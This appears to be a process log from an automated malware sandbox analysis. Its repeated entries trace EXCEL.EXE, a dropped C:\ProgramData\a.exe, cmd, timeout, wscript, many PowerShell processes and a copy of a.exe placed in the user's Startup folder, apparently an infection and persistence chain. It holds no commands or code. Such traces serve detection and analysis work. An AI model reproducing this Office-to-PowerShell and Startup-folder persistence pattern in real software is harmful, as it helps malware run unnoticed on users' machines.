Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\timeout.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\timeout.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Process information set: NOOPENFILEERRORBOX
